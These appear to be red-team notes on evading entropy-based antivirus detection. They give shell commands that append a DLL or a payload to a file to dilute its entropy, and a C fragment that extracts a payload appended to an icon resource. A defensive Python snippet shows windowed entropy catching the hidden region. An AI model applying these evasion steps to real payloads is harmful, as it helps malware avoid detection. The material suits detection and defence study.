Red Team Notes

Binary entropy is a concept from information theory that measures the randomness or uncertainty of a sequence of bytes. In the context of malware detection, the entropy of a binary file is used to characterise its contents and flag it as suspicious or potentially malicious.

By looking at the entropy, an encrypted payload can be easily detected: encrypted or compressed data has an entropy close to the maximum of 8 bits per byte, while ordinary code and data are noticeably lower.

We can see the binary entropy of a file with the Helenium Hex Editor software.

As an example, here we can see a basic loader that carries an encrypted copy of mimikatz.

There are some tricks to bypass entropy-based defensive measures. Both of the following append data to a file so that the whole-file entropy average is diluted:

type c:\Windows\System32\kernel32.dll >> bin.exe
type payload.bin >> a.jpg

Note: We need to know the original size of the image, since the appended payload starts at that byte offset.
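The following is an added example (not code from the original notes) that illustrates both the entropy detection described above and why the append tricks only dilute the whole-file average: it computes Shannon entropy over a whole buffer and over fixed-size windows, using a constructed low-entropy "image" followed by a pseudo-random blob that stands in for an encrypted payload. The window size of 4096 bytes and the 7.2 bits/byte threshold are assumptions for the demonstration.

```python
import math
import random
from collections import Counter


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy of a byte string in bits per byte (0.0 for empty input, 8.0 max)."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def windowed_entropy(data: bytes, window: int = 4096) -> list:
    """Entropy of each consecutive fixed-size chunk (the last chunk may be shorter)."""
    return [shannon_entropy(data[i:i + window]) for i in range(0, len(data), window)]


def high_entropy_regions(data: bytes, window: int = 4096, threshold: float = 7.2) -> list:
    """(offset, entropy) for every window above the threshold.

    7.2 bits/byte is a common heuristic cut-off for compressed or encrypted data;
    the value is an assumption here and should be tuned against known-good files.
    """
    return [(i * window, e)
            for i, e in enumerate(windowed_entropy(data, window)) if e > threshold]


# Constructed sample input (not a real file): a repetitive low-entropy "image" body
# followed by a pseudo-random blob standing in for an encrypted payload.
_rng = random.Random(1)
CARRIER = bytes(range(16)) * 16384                          # 256 KiB, entropy exactly 4.0
PAYLOAD = bytes(_rng.getrandbits(8) for _ in range(32768))  # 32 KiB, entropy close to 8.0
SAMPLE = CARRIER + PAYLOAD


def analyse(data: bytes) -> dict:
    """Whole-file entropy next to the windowed hits, to show why the former is not enough."""
    return {
        "whole_file": shannon_entropy(data),
        "hits": high_entropy_regions(data),
    }


if __name__ == "__main__":
    result = analyse(SAMPLE)
    print(f"whole-file entropy: {result['whole_file']:.2f} bits/byte")
    for offset, ent in result["hits"]:
        print(f"  high-entropy window at offset 0x{offset:06x}: {ent:.2f}")
```

On the constructed sample the whole-file entropy lands around 4.9 bits/byte, well under the threshold, while every 4 KiB window from offset 262144 onward scores close to 8, which is why per-window or per-section entropy is the check to rely on.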

Example of loading a payload that was appended to an image, with the image stored in the .rsrc section.

#include <Windows.h>
#include <stdio.h>
#include "resources.h"   // project header that defines the FAVICON_ICO resource id

#define IMAGE_LEN  196676 // length in bytes of the original image; the payload starts right after it

int main(int argc, char **argv) {
    HRSRC res;
    HGLOBAL resHandle = NULL;
    unsigned char *payload;
    unsigned int payload_len;
    SIZE_T sDataSize;

    // Locate the RCDATA resource holding favicon.ico with the payload appended to it
    res = FindResource(NULL, MAKEINTRESOURCE(FAVICON_ICO), RT_RCDATA);
    if (res == NULL) {
        printf("FindResource failed: %lu\n", GetLastError());
        return 1;
    }
    resHandle = LoadResource(NULL, res);
    if (resHandle == NULL) {
        printf("LoadResource failed: %lu\n", GetLastError());
        return 1;
    }
    // Sanity check: the resource must be larger than the original image or nothing was appended
    if (SizeofResource(NULL, res) <= IMAGE_LEN) {
        printf("Resource is not larger than the original image; no payload appended\n");
        return 1;
    }
    // Everything after the original image bytes is the appended payload
    payload = (unsigned char *) LockResource(resHandle) + IMAGE_LEN;
    payload_len = SizeofResource(NULL, res) - IMAGE_LEN;
    sDataSize = payload_len;

    return 0;
}